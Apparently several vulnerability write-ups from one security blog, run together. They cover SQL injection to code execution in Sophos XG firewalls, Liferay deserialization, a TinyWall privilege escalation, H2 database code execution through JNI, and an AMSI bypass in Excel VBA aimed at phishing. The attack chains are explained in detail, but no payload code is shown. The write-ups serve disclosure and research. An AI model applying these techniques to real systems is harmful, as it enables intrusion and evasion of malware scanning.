Asnarök campaign: exploitable pre-authentication either via an exposed
user or admin portal. Sophos quickly reacted to our bug report, issued
hotfixes for the supported firmware versions and released new firmware
versions for v17.5 and v18.0 (see also the Sophos Community Advisory).
I am Groot
The lab environment setup will not be covered
in full detail since it is pretty straight forward to deploy a virtual XG
firewall. Appropriate firmware ISOs can be obtained from the official download
portal. What is notable is the fact that the firmware allows administrators direct root shell access via the serial interface, the
TelnetConsole.jsp in the web interface or the SSH server. Thus there was
no need to escape from any restricted shells or to evade other
protection measures in order to start the analysis.
Device
Management -> Advanced Shell -> /bin/sh as root.
After getting familiar with the filesystem layout,
exposed ports and running processes we suddenly noticed a message in the XG
control center informing us that a hotfix for the n-day vulnerability, we were
investigating, had automatically been applied.
Control Center after the
automatic installation of the hotfix (source).
We leveraged this behavior to create a file-system
snapshot before and after the hotfix. Unfortunately diffing the web root
folders in both snapshots (aiming for a quick win) resulted in only one changed
file with no direct indication of a fixed SQL operation.
Architecture
In order to understand the hotfix, it was
necessary to delve deep into the underlying software architecture. As the
published information indicated that the issue could be triggered via the web
interface we were especially interested in how incoming HTTP requests
were processed by the appliance.
Both web interfaces (user and admin) are based
on the same Java code served by a Jetty server behind an Apache server.
Jetty
server on port 8009 serving /usr/share/webconsole.
Most interface interactions (like a login
attempt) resulted in a HTTP POST request to the endpoint
/webconsole/Controller. Such a request contained at least two
parameters: mode and json. The former specified a number which was
mapped internally to a function that should be invoked. The latter specified the
arguments for this function call.
Login
request sent to /webconsole/Controller via XHR.
The corresponding Servlet checked if the
requested function required authentication, performed some basic parameter
validation (code was dependent on the called function) and transmitted a message
to another component - CSC.
This message followed a custom format and was
sent via either UDP or TCP to port 299 on the local machine (the firewall). The
message contained a JSON object which was similar but not identical to the
json parameter provided in the initial HTTP request.
JSON
object sent to CSC on port 299.
The CSC component (/usr/bin/csc) appeared to be
written in C and consisted of multiple sub modules (similar to a busybox
binary). To our understanding this binary is a service manager for the firewall
as it contained, started and controlled several other jobs. We encountered a
similar architecture during our Fortinet research.
Multiple
different processes spawned by the CSC binary.
CSC parsed the incoming JSON object and called
the requested function with the provided parameters. These functions however,
were implemented in Perl and were invoked via the Perl C language interface.
In order to do so, the binary loaded and decrypted an XOR encrypted file
(cscconf.bin) which contained various config files and Perl packages.
Another essential part of the architecture were
the different PostgreSQL database instances which were used by the web interface,
the CSC and the Perl logic, simultaneously.
The
three PostgreSQL databases utilized by the appliance.
High
level overview of the architecture.
Locating the Perl logic
As mentioned earlier, the Java component
forwarded a modified version of the JSON parameter (found in the HTTP
request) to the CSC binary. Therefore we started by having a closer look at
this file. A disassembler helped us to detect the different sub modules which
were distributed across several internal functions, but did not reveal any logic
related to the login request. We did however find plenty of imports related to
the Perl C language interface. This led us to the assumption that the relevant
logic was stored in external Perl files, even though an intensive search on the
filesystem had not returned anything useful. It turned out, that the missing Perl
code and various configuration files were stored in the encrypted tar.gz
file (/_conf/cscconf.bin) which was decrypted and extracted during the
initialization of CSC. The reason why we previously could not locate the decrypted files
was that these could only be found in a separate linux namespace.
As can be seen in the screenshot below the
binary created a mount point and called the unshare
syscall with the flag parameter set to 0x20000. This constant translates
to the CLONE_NEWNS flag, which disassociates the process from the
initial mount namespace.
For those unfamiliar with Linux namespaces: in
general each process is associated with a namespace and can only see, and thus
use, the resources associated with that namespace. By detaching itself from the
initial namespace the binary ensures that all files created after the
unshare syscall are not propagated to other processes. Namespaces
are a feature of the Linux kernel and container solutions like docker heavily rely on them.
Calling
unshare, to detach from the initial namespace, before extracting the
config.
Therefore even within a root shell we were not
able to access the extracted archive. Whilst multiple approaches exist to
overcome this, the most appealing at that point was to simply patch the
binary. This way, it was possible to copy the extracted config to a
world-writable path. In hindsight, it would probably have been easier to just scp
nsenter to the appliance.
Accessing the decrypted and extracted files by jumping into the
namespace of the CSC binary.
From a handful of information to the N-Day
(CVE-2020-12271)
The rolled out hotfix boiled down to the
modification of one existing function (_send) and the introduction of
two new functions (getPreAuthOperationList and
addEventAndEntityInPayload) in the file
/usr/share/webconsole/WEB-INF/classes/cyberoam/corporate/CSCClient.class.
The function getPreAuthOperationList
defined all modes which can be called unauthenticated. The function
addEventAndEntityInPayload checks if the mode specified in the request
is contained in the preAuthOperationsList and removes the Entity
and Event keys from the JSON object if that is the case.
Analysis
Based on the hotfix we assumed that the
vulnerability must reside within one of the functions specified in the
getPreAuthOperationList. However, after browsing through the relevant
Perl code in order to find blocks that made use of the Entity or
Event key, we were pretty confident that this was not the case.
What we did notice though is that regardless of
which mode we specify, every request was processed by the apiInterface
function. Sophos denoted the functions mapped to the mode parameter internally
as opcodes.
The apiInterface function was also the
place where we finally found the SQLi vulnerability aka execution of
arbitrary SQL statements. As is depicted in the source excerpt below, this
opcode called the executeDeleteQuery function (line 27) which took a SQL
statement from the query parameter and ran it against the database.
Unfortunately, in order to reach the vulnerable
code, our payload needed to pass every preceding CALL statement which
enforced various conditions and properties on our JSON object.
The first call (validateRequestType)
required that Entity was not set to securitypolicy and that the
request type was ORM after the call.
The preceding call
(variableInitialization) initialized the Perl environment and should
always succeed. In order to keep our request simple and not to introduce
additional requirements, the Entity value in our payload should not be one of
the following: securityprofile, mtadataprotectionpolicy,
dataprotectionpolicy, firewallgroup, securitypolicy, formtemplate or
authprofile. This allowed us to skip the checks performed in the function
opcodePreProcess.
The checkUserPermission function does
what its name suggests. Whereas, the function body that can be seen below is
only executed if the JSON object passed to Perl included a __username
parameter. This parameter was added by the Java component before the request was
forwarded to the CSC binary, if the HTTP request was associated with a valid
user session. Since we used an unauthenticated mode in our payload, the
__username parameter was not set and we could ignore the respective
code.
To skip over the preMigration call we
just had to choose a mode which was unequal to 35 (cancel_firmware_upload),
36 (multicast_sroutes_disable) or 1101 (unknown). On top of that all
three modes required authentication making them unusable for our purposes,
anyway.
Depending on the request type, the function
createModeJSON employed a different logic to load the Perl module
connected to the specified entity. Whereas each POST request initially started
as ORM request, we needed to be careful that the request type was not
changed to something else. This was required to satisfy the last if statement
before the vulnerable function was called inside the apiInterface
function. Therefore the condition on line 15 had to be not satisfied. The
respective code checked if the request type specified in the loaded Perl module
equaled ORM. We leave the identification of such an Entity as an exercise
to the interested reader.
We skipped the call to the
migrateToCurrVersion function since it was not important for our chain.
The next call to createJson verified if the previously loaded Perl
package could actually be initialized and would always work as long as it referred to an
existing Entity.
The function handleDeleteRequest once
again verified that the request type was ORM. After removing duplicate
keys from our JSON, it ensured that our JSON payload contained a name
key. The code then looped through all values which were specified in our
name property and searched for foreign references in other database
tables in order to delete these. Since we did not want to delete any existing
data we simply set the name to a non-existing value.
We skipped the last two function calls to
replyIfErrorAtValidation and getOldObject because they were not
relevant to our chain and we had already walked through enough Perl code.
What did we learn so far?
We need a mode which can be called
from an unauthenticated perspective.
We should not use certain Entities.
Our
request needed to be of type $REQUEST_TYPE{ORMREQUEST}.
The
request had to contain a name property which held some garbage value.
The EventProperties of the loaded Entity, and in particular the
DELETE property, had to set the ORM value to true.
Our
JSON object had to contain a query key which held the actual SQL statement we
wanted to execute.
When we satisfied all of the above conditions we
were able to execute arbitrary SQL statements. There was only one caveat: we could
not use any quotes in our SQL statements since the csc binary properly
escaped those (see the escapeRequest sub 0-day chapter for details). As a workaround we defined
strings with the help of the concat and chr SQL functions.
From SQLi to RCE
Once we had gained the ability to modify the
database to our needs, there were quite a few places where the SQLi could be
expanded into an RCE. This was the case because parameters contained within the database were passed
to exec calls without sanitation in multiple instances. Here we will only
focus on the attack path which was, based on our understanding and the details
released in Sophos' analysis, used during the Asnarök campaign.
According to the published information, the
attackers injected their payloads in the hostname field of the Sophos
Firewall Manager (SFM) to achive code execution. SFM is a separate
appliance to centrally manage multiple appliances. This raised the question:
what happens in the back end if you enable the central administration?
To locate the database values related to the
SFM functionality we dumped the database, enabled SFM in the front end,
and created another dump. A diff of the dumps was then used to identify the
changed values. This approach revealed the modification of multiple database
rows. The attribute CCCAdminIP in the table
tblclientservices was the one used by the attackers to inject their
payload. A simple grep for CCCAdminIP directed us to the function
get_SOA in the Perl code.
As can be seen on line 15, the code retrieves the
value of the CCCAdminIP from the database and passes it
unfiltered into the EXECSH call on line 22. Due to some kind of cronjob
the get_SOA opcode is executed regularly leading to the automatic
execution of our payload.
What made this particular attack chain very
unfortunate was the if condition on line 11, as it allowed us to reach the EXECSH
call only if the automatic installation of hotfixes is active (which is the
default setting) and if the appliance is configured to use SFM for central management (which is not the default setting). This resulted in a situation in which the attackers most likely
only gained code execution on devices with activated auto-updates - leading to
a race condition between the hotfix installation and the moment of exploitation.
Installations that do not have automatic hotfixes enabled or have not moved to the latest supported maintenance releases could still be vulnerable.
Gaining
code execution via the SQLi described in
CVE-2020-12271.
From N to Zero (CVE-2020-15504)
Another promising approach for discovery of the
n-day, instead of starting at a patch diff, seemed to be an analysis of all
back end functions (callable via the /webconsole/Controller
endpoint) which did not require authentication. The respective function numbers
could, for example, be extracted from the Java function
getPreAuthOperationList.
SQL-Injection countermeasures inside the Perl
logic
Despite of the fact that the back end performed
all its SQL operations without prepared-statements, those were not automatically
susceptible to injection.
The reason for this was, that all function
parameters coming in via port 299 were automatically escaped via the
escapeRequest function before being processed.
So everything is safe?
One function which caught our attention was
RELEASEQUARANTINEMAILFROMMAIL (NR 2531) as the corresponding logic
silently bypassed the automatic escaping. This happened because the function
treated one of the user-controllable parameters as a Base64 string and used this
parameter, decoded, inside a SQL statement. As the global escaping took place
before the function was actually called, it only ever saw the encoded string and
thus missed any included special characters such as single quotes.
After the parameter was decoded, it was split into
different variables. This was done by parsing the string based on the
key=value syntax used in HTTP requests. We were concentrating on the
hdnFilePath variable, as its value did not need to satisfy any
complicated conditions and ended up in the SQL statement later on.
The only constraint for
$requestData{hdnFilePath} was, that it did not contain the sequence
../ (which was irrelevant for our purposes anyway). After crafting a release
parameter in the appropriate format we were now able to trigger a SQLi in
the above SELECT statement. We had to be careful to not
break the syntax by taking into account that the manipulated parameter was
inserted six times into the query.
Triggering a database sleep
through the discovered SQL-I (6s delay as the sleep command was injected 6 times).
Upgrading the boring Select statement
The ability to trigger a sleep enables an
attacker to use well known blind SQLi techniques to read out arbitrary database
values. The underlying Postgres instance (iviewdb) differed from
the one targeted in the n-day. As this database did not seem to store any
values useful for further attacks, another approach was chosen.
With the code-execution technique used
by Asnarök in mind, we aimed for the execution of an INSERT operation alongside a SELECT.
In theory, this should be easily achievable by using stacked queries.
After some experimentation, we were able to confirm that stacked queries were
supported by the deployed Postgres version and the used database API. Yet, it
was impossible to get it to work through the SQLi. After some frustration,
we found out that the function iviewdb_query (/lib/libcscaid.so)
called the escape_string (/usr/bin/csc) function before submitting the
query. As this function escaped all semicolons in the SQL statement, the use of
stacked queries was made impossible.
Giving up yet?
At this point, we were able to
trigger an unauthenticated SQL Injection in a SELECT statement in the
iviewdb database, which did not provide us with any meaningful starting points for an escalation to RCE.
Not wanting to abandon the goal of achieving code execution we brainstormed for other approaches.
Eventually we came up with the following idea - what if we modified our payload in such a
way that the SQL statement returned values in the expected form? Could this
allow us to trigger the subsequent Perl logic and eventually reach a point where
a code execution took place? Constructing a payload which enabled us to return arbitrary
values in the queried columns took some attempts but succeeded in the end.
Execution of a SELECT statement which returns values specified inside
the payload.
After we had managed to construct such a payload we
concentrated on the subsequent Perl logic. Looking at the source we found a
promising EXEC call just after the database query. And one of the
parameters for that call was derived from a variable under user control.
Unfortunately, the variable $g_ha_mode
(most likely related to the high availability feature) was set to false
in the default configuration. This prompted us to look for a better way.
The function mergequarantine_manage did not contain any further
exec calls but triggered two other Perl functions in the same file, under the
right conditions. Those functions were triggered via the
apiInterface opcode which generated a new CSC request on port 299.
In our case $request->{action} was
always set to release restricting us to a call to
manage_quarantine. This function used its submitted parameters
(result-set from the query in mergequarantine_manage) to trigger another
SELECT statement. When this statement returned matching values an EXEC
call was triggered, which got one of the returned values as a parameter.
The question now was how the result-set of
the second SELECT statement could be manipulated through the result-set of
the first statement?
How about returning values in the first query which would trigger
a SQLi in the second statement? Because string concatenation was used to construct the statement this should have been possible in theory.
Unfortunately, we were unable to obtain the desired results. This was after having invested quite a bit of work to craft such a payload.
A brief analysis of how our payload was processed, revealed that it was somehow escaped before reaching the
second query.
As it turned out, the reason for this was actually pretty obvious. As the function
was triggered via a new CSC request, it automatically passed through the
previously described escape logic.
Time to accept our defeat and be happy with
the boring SQLi? Not quite...
Desperately looking for other ways to weaponize
the injection we dug deeper into the involved components. At an earlier stage
we already created a full dump of the iviewdb database but did not pay
too much attention to it after having realized that it did not include any useful
information. On revisiting the database, one of its features - so called user-defined
functions - heavily used by the appliance, stood out.
User-defined functions enable the extension of the
predefined database operations by defining your own SQL functions. Those can be
written in Postgres' own language: PL/pgSQL. What made such functions
interesting for our attack was, that previously defined functions could be called
in-line in SELECT statements. The call-syntax is the same as for any other SQL
function, i.e. SELECT my_function(param1, param2) FROM table;.
The idea at this point was, that one of the
existing user-defined functions might allow the execution of stacked queries.
This would be the case as soon as a parameter was used for a SQL statement without
proper filtering inside a function. Walking over the database dump revealed
multiple code blocks matching this characteristic and to our surprise an even simpler way to execute arbitrary statements - the function execute.
The respective code expected only one parameter which was directly executed as SQL
statement without any further checks.
This function would, in theory, allow us to
execute an INSERT statement inside the SELECT query of
mergequarantine_manage. This could be then used to add database rows to
the table tblquarantinespammailmerge which should later end up in the
exec call in manage_quarantine.
Triggering an INSERT statement
via the execute function from within a SELECT statement.
After fiddling around for quite some time we
were finally able to construct an appropriate payload (see below).
Explanation:
Line 1-2: Defining the two HTTP parameters needed for mode
2531.
Line 3-6: Defining the three Base64 encoded parameters, that are
needed to pass the initial checks in mergequarantine_manage.
Line 7: Triggering the SQLi by injecting a single quote.
Line
8-11: Utilizing the user-defined function execute in order to trigger
different SQL operations than the predefined SELECT.
Line 10: Adding
a new row to the table tblquarantinespammailmerge that contains our
code-execution payload in the field quarantinearea and sets messageid
to 'a'. Note the .eml portion inside the payload, which is
required to reach the exec call.
Line 9: Delete all rows
from tblquarantinespammailmerge where the messageid equals 'a'.
This ensures that the mentioned table contains our payload only once (remember
that the vector is injected 6x in the initial statement). Whereas this is not
absolutely necessary it simplifies the path taken after the SELECT statement in
manage_quarantine and prevents our payload to be executed multiple
times.
Line 12-14: Needed to comply with the syntax of the predefined
statement.
Using the above payload resulted in the
execution of the following Perl command:
So finally our job was done... but somehow there seemed to be no time delay, which would indicate that our
sleep has not actually triggered. But why? Did we not use exactly the same execution
mechanism as in the n-day? Turns out - not quite. Asnarök used
EXECSH we have EXEC. Unfortunately EXEC is treating
spaces in arguments correctly by passing them in single values to the script.
I assume we better bury our heads in the
sand
We had come to far to give up now, so we carried on.
Finally we were able to execute code through the SQLi and it was good ol' Perl which allowed us to do so.
Adding this last piece to the attack chain and
fixing a minor issue in the posted payload is left up to the reader.
Triggering a reverse shell by abusing the discovered vulnerability.
Timeline
04.05.2020 - 22:48 UTC: Vulnerability
reported to Sophos via BugCrowd.
04.05.2020 - 23:56 UTC: First reaction
from Sophos confirming the report receipt.
05.05.2020 - 12:23
UTC: Message from Sophos that they were able to reproduce the issue and are
working on a fix.
05.05.2020: Roll out of a first automatic hotfix by
Sophos.
16.05.2020 - 23:55 UTC: Reported a possible bypass for the
added security measurements in the hotfix.
21.05.2020: Second hotfix
released by Sophos which disables the pre-auth email quarantine release
feature.
June 2020: Release of firmware 18.0 MR1-1 which contains a
built-in fix.
July 2020: Release of firmware 17.5 MR13 which contains a built-in fix.
13.07.2020: Release of the blog post in accordance with the vendor after ensuring that the majority of devices either received the hotfix or the new firmware version.
We highly appreciate the quick response times,
very friendly communication as well as the hotfix feature.
Code White has found multiple critical rated JSON deserialization vulnerabilities affecting the Liferay Portal versions 6.1, 6.2, 7.0, 7.1, and 7.2. They allow unauthenticated remote code execution via the JSON web services API. Fixed Liferay Portal versions are 6.2 GA6, 7.0 GA7, 7.1 GA4, and 7.2 GA2.
The JSONWebServiceActionParametersMap of Liferay Portal allows the instantiation of arbitrary classes and invocation of arbitrary setter methods.
Both allow the instantiation of an arbitrary class via its parameter-less constructor and the invocation of setter methods similar to the JavaBeans convention. This allows unauthenticated remote code execution via various publicly known gadgets.
Liferay Portal is one of the, if not even the most popular portal implementation as per Java Portlet Specification JSR-168. It provides a comprehensive JSON web service API at '/api/jsonws' with examples for three different ways of invoking the web service method:
Via the generic URL /api/jsonws/invoke where the service method and its arguments get transmitted via POST, either as a JSON object or via form-based parameters (the JavaScript Example)
Via the service method specific URL like /api/jsonws/service-class-name/service-method-name where the arguments are passed via form-based POST parameters (the curl Example)
Via the service method specific URL like /api/jsonws/service-class-name/service-method-name where the arguments are also passed in the URL like /api/jsonws/service-class-name/service-method-name/arg1/val1/arg2/val2/… (the URL Example)
Authentication and authorization checks are implemented within the invoked service methods themselves while the processing of the request and thus the JSON deserialization happens before. However, the JSON web service API can also be configured to deny unauthenticated access.
First, we will take a quick look at LPS-88051, a vulnerability/insecure feature in the JSON deserializer itself. Then we will walk through LPS-97029 that also utilizes a feature of the JSON deserializer but is a vulnerability in Liferay Portal itself.
CST-7111: Flexjson's JSONDeserializer
In Liferay Portal 6.1 and 6.2, the Flexjson library is used for serializing and deserializing data. It supports object binding that will use setter methods of the objects instanciated for any class with a parameter-less constructor. The specification of the class is made with the class object key:
In Liferay Portal 7, the Flexjson library is replaced by the Jodd Json library that does not support specifying the class to deserialize within the JSON data itself. Instead, only the type of the root object can be specified and it has to be explicitly provided by a java.lang.Class object instance. When looking for the call hierarchy of write access to the rootType field, the following unveils:
While most of the calls have hard-coded types specified, there is one that is variable (see selected call on the right above). Tracing that parameterType variable through the call hierarchy backwards shows that it originates from a ClassLoader.loadClass(String) call with a parameter value originating from an JSONWebServiceActionParameters instance. That object holds the parameters passed in the web service call. The JSONWebServiceActionParameters object has an instance of a JSONWebServiceActionParametersMap that has a _parameterTypes field for mapping parameters to types. That map is used to look up the class for deserialization during preparation of the parameters for invoking the web service method in JSONWebServiceActionImpl._prepareParameters(Class<?>).
Here the lines 102 to 110 are interesting: the typeName is taken from the key string passed in. So if a request parameter name contains a ':', the part after it specifies the parameter's type, i. e.:
This vulnerability was reported in June 2019 and has been fixed this in 6.2 GA6, 7.0 GA7, 7.1 GA4, and 7.2 GA2 by using a whitelist of allowed classes.
Demo
[1] There are two editions of the Liferay Portal: the Community Edition (CE) and the Enterprise Edition (EE). The CE is free and its source code is available at GitHub. Both editions have their own project and issue tracker at issues.liferay.com: CE has LPS-* and EE has LPE-*. LPS-88051 was created confidentially by Code White for CE and LPE-16598 was created publicly three days later for EE.
[2] Fixpacks are only available for the Enterprise Edition (EE) and not for the Community Edition (CE).
This blog post describes an interesting privilege escalation from a local user to SYSTEM for a well-known local firewall solution called TinyWall in versions prior to 2.1.13. Besides a .NET deserialization flaw through Named Pipe communication, an authentication bypass is explained as well.
Introduction
TinyWall is a local firewall written in .NET. It consists of a single executable that runs once as SYSTEM and once in the user context to configure it. The server listens on a Named Pipe for messages that are transmitted in the form of serialized object streams using the well-known and beloved BinaryFormatter. However, there is an additional authentication check that we found interesting to examine and that we want to elaborate here a little more closely as it may also be used by other products to protect themselves from unauthorized access.
For the sake of simplicity the remaining article will use the terms Server for the receiving SYSTEM process and Client for the sending process within an authenticated user context, respectively. Keep in mind that the authenticated user does not need any special privileges (e.g. SeDebugPrivilege) to exploit this vulnerability described.
Named Pipe Communication
Many (security) products use Named Pipes for inter-process communication (e.g. see Anti Virus products). One of the advantages of Named Pipes is that a Server process has access to additional information on the sender like the origin Process ID, Security Context etc. through Windows' Authentication model. Access to Named Pipes from a programmatic perspective is provided through Windows API calls but can also be achieved e.g. via direct filesystem access. The Named Pipe filessystem (NPFS) is accessible via the Named Pipe's name with a prefix \\.\pipe\.
The screenshot below confirms that a Named Pipe "TinyWallController" exists and could be accessed and written into by any authenticated user.
Talking to SYSTEM
First of all, let's look how the Named Pipe is created and used. When TinyWall starts, a PipeServerWorker method takes care of a proper Named Pipe setup. For this the Windows API provides System.IO.Pipes.NamedPipeServerStream with one of it's constructors taking a parameter of System.IO.Pipes.PipeSecurity. This allows for fine-grained access control via System.IO.PipeAccessRule objects using SecurityIdentifiers and alike. Well, as one can observe from the first screenshot above, the only restriction seems to be that the Client process has to be executed in an authenticated user context which doesn't seem to be a hard restriction after all.
But as it turned out (again take a look at the screenshot above) an AuthAsServer() method is implemented to do some further checking. What we want is to reach the ReadMsg() call, responsible for deserializing the content from the message received.
If the check fails, an InvalidOperationException with "Client authentication failed" is thrown. Following the code brought us to a "authentication check" based on Process IDs, namely checking if the MainModule.FileName of the Server and Client process match. The idea behind this implementation seems to be that the same trusted TinyWall binary should be used to send and receive well-defined messages over the Named Pipe.
Since the test for equality using the MainModule.FileName property could automatically be passed when the original binary is used in a debugging context, let's verify the untrusted deserialization with a debugger first.
Testing the deserialization
Thus, to test if the deserialization with a malicious object would be possible at all, the following approach was taken. Starting (not attaching) the TinyWall binary out of a debugger (dnSpy in this case) would fulfill the requirement mentioned above such that setting a breakpoint right before the Client writes the message into the pipe would allow us to change the serialized object accordingly. The System.IO.PipeStream.writeCore() method in the Windows System.Core.dll is one candidate in the process flow where a breakpoint could be set for this kind of modification. Therefore, starting the TinyWall binary in a debugging session out of dnSpy and setting a breakpoint at this method immediately resulted in the breakpoint being hit.
Now, we created a malicious object with ysoserial.NET and James Forshaw's TypeConfuseDelegate gadget to pop a calc process. In the debugger, we use System.Convert.FromBase64String("...") as expression to replace the current value and also adjust the count accordingly.
Releasing the breakpoint resulted in a calc process running as SYSTEM. Since the deserialization took place before the explicit cast was triggered, it was already to late. If one doesn't like InvalidCastExceptions, the malicious object could also be put into a TinyWall PKSoft.Message object's Arguments member, an exercise left to the reader.
Faking the MainModule.FileName
After we have verified the deserialization flaw by debugging the client, let's see if we can get rid of the debugging requirement. So somehow the following restriction had to be bypassed:
The GetNamedPipeClientProcessId() method from Windows API retrieves the client process identifier for the specified Named Pipe. For a final proof-of-concept Exploit.exe our Client process somehow had to fake its MainModule.FileName property matching the TinyWall binary path. This property is retrieved from System.Diagnostics.ProcessModule's member System.Diagnostics.ModuleInfo.FileName which is set by a native call GetModuleFileNameEx() from psapi.dll. These calls are made in System.Diagnostics.NtProcessManager expressing the transition from .NET into the Windows Native API world. So we had to ask ourselves if it'd be possible to control this property.
As it turned out this property was retrieved from the Process
Environment Block (PEB) which is under full control of the process owner. The PEB by design is writeable from userland. Using NtQueryInformationProcess to get a handle on the process' PEB in the first place is therefore possible. The _PEB struct is built of several entries as e.g. PRTL_USER_PROCESS_PARAMETERS ProcessParameters and a double linked list PPEB_LDR_DATA Ldr. Both could be used to overwrite the relevant Unicode Strings in memory. The first structure could be used to fake the ImagePathName and CommandLine entries but more interesting for us was the double linked list containing the FullDllName and BaseDllName. These are exactly the PEB entries which are read by the Windows API call of TinyWall's MainModule.FileName code. There is also a nice Phrack article from 2007 explaining the underlying data structures in great detail.
Fortunately, Ruben Boonen (@FuzzySec) already did some research on
these kind of topics and released several PowerShell scripts. One of these
scripts is called Masquerade-PEB which operates on the Process
Environment Block (PEB) of a running process to fake the attributes
mentioned above in memory. With a slight modification of this script (also left to the
reader) this enabled us to fake the MainModule.FileName.
Even though the PowerShell implementation could have been ported to C#, we chose the lazy path and imported the System.Management.Automation.dll into our C# Exploit.exe. Creating a PowerShell instance, reading in the modified Masquerade-PEB.ps1 and invoking the code hopefully would result in our faked PEB entries of our Exploit.exe.
Checking the result with a tool like Sysinternals Process Explorer confirmed our assumption such that the full exploit could be implemented now to pop some calc without any debugger.
Popping the calc
Implementing the full exploit now was straight-forward. Using our existing code of James Forshaw's TypeConfuseDelegate code combined with Ruben Boonen's PowerShell script being invoked at the very beginning of our Exploit.exe now was extended by connecting to the Named Pipe TinyWallController. The System.IO.Pipes.NamedPipeClientStream variable pipeClient was finally fed into a BinaryFormatter.Serialize() together with the gadget popping the calc.
Thanks to Ruben Boonen's work and support of my colleague Markus Wulftange the final exploit was implemented quickly.
Responsible disclosure
The vulnerability details were sent to the TinyWall developers on 2019-11-27 and fixed in version 2.1.13 (available since 2019-12-31).
Techniques to gain code execution in an H2 Database Engine are already well known but require H2 being able to compile Java code on the fly. This blog post will show a previously undisclosed way of exploiting H2 without the need of the Java compiler being available, a way that leads us through the native world just to return into the Java world using Java Native Interface (JNI).
But what if the Java compiler is not available? This was the exact case in a recent engagement where a H2 Dabatase Engine instance version 1.2.141 on a Windows system was exposing its web console. We want to walk you through the journey of finding a new way to execute arbitrary Java code without the need of a Java compiler on the target server by utilizing native libraries (.dll or .so) and the Java Native Interface (JNI).
Assessing the Capabilities of H2
Let's assume the CREATE ALIAS … AS … command cannot be used as the Java compiler is not available. A reason for that may be that it's not a Java Development Kit (JDK) but only a Java Runtime Environment (JRE), which does not come with a compiler. Or the PATH environment variable is not properly set up so that the Java compiler javac cannot be found.
When referencing a method, the class must already be compiled and included in the classpath where the database is running. Only static Java methods are supported; both the class and the method must be public.
So every public static method can be used. But in the worst case, only h2-1.2.141.jar and JRE are available. And additionally, only supported data types can be used for nested function calls. So, what is left?
While browsing the candidates in the Java runtime library rt.jar, the System.load(String) method stood out. It allows the loading of a native library. That would instantly allow code execution via the library's entry point function.
But how can the library be loaded to the H2 server? Although Java on Windows supports UNC paths and fetches the file, it refuses to actually load it. And this also won't work on Linux. So how can one write a file to the H2 server?
But while looking at the other supported options fieldSeparator, fieldDelimiter, escape, null, and lineSeparator, there came an idea: what if we blank them all out and use the CSV column header to write our data? And if the H2 database engine allows columns to have arbitrary names with arbitrary length, we ware be able to write arbitrary data.
Quoted names are case sensitive, and can contain spaces. There is no maximum name length. Two double quotes can be used to create a single double quote inside an identifier.
That sounds almost perfect. So let's see if we can actually put anything in it and if CSVWRITE is binary-safe.
First, we generate our test data that covers all 8-bit octets:
$ python -c 'import sys;[sys.stdout.write(chr(i)) for i in range(0,256)]' > test.bin
$ sha1sum test.bin
4916d6bdb7f78e6803698cab32d1586ea457dfc8 test.bin
Now we generate a series of CHAR(n) function calls that will generate our binary data in the SQL query:
Finally, we test if the written file has the same checksum:
C:\Windows\Temp> certutil -hashfile test.bin SHA1
SHA1 hash of file test.bin:
49 16 d6 bd b7 f7 8e 68 03 69 8c ab 32 d1 58 6e a4 57 df c8
CertUtil: -hashfile command completed successfully.
So, the files seem to be identical!
Entering the native World
Now that we can write a native library to disk using the built-in function CSVWRITE and load it by creating an alias for System.load(String), we just could use the library's entry point to achieve code execution.
But let's take another it step further. Let's see if there is a way to execute arbitrary commands/code from SQL. Not just once the native library gets loaded, but as we like, possibly even with feedback that we can see in the H2 Console.
This is where the Java Native Interface (JNI) comes in. It allows the interaction between native code and the Java Virtual Machine (JVM). So in this case it would allow us to interact with JVM where the H2 Database is running.
The idea now is to use JNI to inject a custom Java class into the running JVM via ClassLoader.defineClass(byte[], int, int). That would allow us to create an alias and call it from SQL.
Calling into the JVM with JNI
First we need to get a handle to the running JVM. This can be done with the JNI_GetCreatedJavaVMs function. Then we attach the current thread to the VM and obtain a JNI interface pointer (JNIEnv). With that pointer we can interact with the JVM and call JNI functions such as FindClass, GetStaticMethodID/GetMethodID> and CallStatic<Type>Method/Call<Type>Method. The plan is to get the system class loader via ClassLoader.getSystemClassLoader() and call defineClass on it:
This basically mimics the following Java code:
The custom Java class JNIScriptEngine has just one single public static method that evaluates the passed script using an available ScriptEngine instance:
Finally, putting everything together:
That way we can execute arbitrary JavaScript code from SQL.
This blog post describes how to bypass Microsoft's AMSI (Antimalware Scan Interface) in Excel using VBA (Visual Basic for Applications). In contrast to other bypasses this approach does not use hardcoded offsets or opcodes but identifies crucial data on the heap and modifies it. The idea of an heap-based bypass has been mentioned by other researchers before but at the time of writing this article no public PoC was available. This blog post will provide the reader with some insights into the AMSI implementation and a generic way to bypass it.
Introduction
Since Microsoft rolled out their AMSI implementation many writeups about
bypassing the implemented mechanism have been released. Code White
regularly conducts Red Team scenarios where phishing plays a great role.
Phishing is often related to MS Office, in detail to malicious scripts
written in VBA. As per Microsoft AMSI
also covers VBA code placed into MS Office documents. This fact
motivated some research performed earlier this year. It has been evaluated
if and how AMSI can be defeated in an MS Office Excel environment.
In the past several different approaches have been published to bypass AMSI. The following links contain information which were used as inspiration or reference:
The first article from the list above also mentions a heap-based approach. Independent from that writeup, Code White's approach used exactly that idea. During the time of writing this article there was no code publicly available which implements this idea. This was another motivation to write this blog post. Porting the bypass to MS Excel/VBA revealed some nice challenges which were to be solved. The following chapters show the evolution of Code White's implementation in a chronological way:
Implementing our own AMSI Client in C to have a debugging platform
Understanding how the AMSI API works
Bypassing AMSI in our own client
Porting this approach to VBA
Improving the bypass
Improving the bypass - making it production-ready
Implementing our own AMSI Client
In order to ease debugging we will implement our own small AMSI client in C which triggers a scan on the malicious string ‘amsiutils’. This string gets flagged as evil since some AMSI Bypasses of Matt Graeber used it. Scanning this simple string depicts a simple way to check if AMSI works at all and to verify if our bypass is functional. A ready-to-use AMSI client can be found on sinn3r's github . This code provided us a good starting point and also contained important hints, e.g. the pre-condition in the Local Group Policies.
We will implement our test client using Microsoft Visual Studio Community 2017. In a first step, we end up with two functions, amsiInit() and amsiScan(), not to be confused with functions exported by amsi.dll. Later we will add another function amsiByPass() which does what its name suggests. See this gist for the final code including the bypass.
Running the program generates the following output:
This means our ‘amsiutils’ is considered as evil. Now we can proceed working on our bypass.
Understanding AMSI Structures
As promised we would like to do a heap-based bypass. But why heap-based?
At first we have to understand that using the AMSI API requires initializing a so called AMSI Context (HAMSICONTEXT). This context must be initialized using the function AmsiInitialize(). Whenever we want to scan something, e.g. by calling AmsiScanBuffer(), we have to pass our context as first parameter. If the data behind this context is invalid the related AMSI functions will fail. This is what we are after, but let's talk about that later.
Having a look at HAMSICONTEXT we will see that this type gets resolved by the pre-processor to the following:
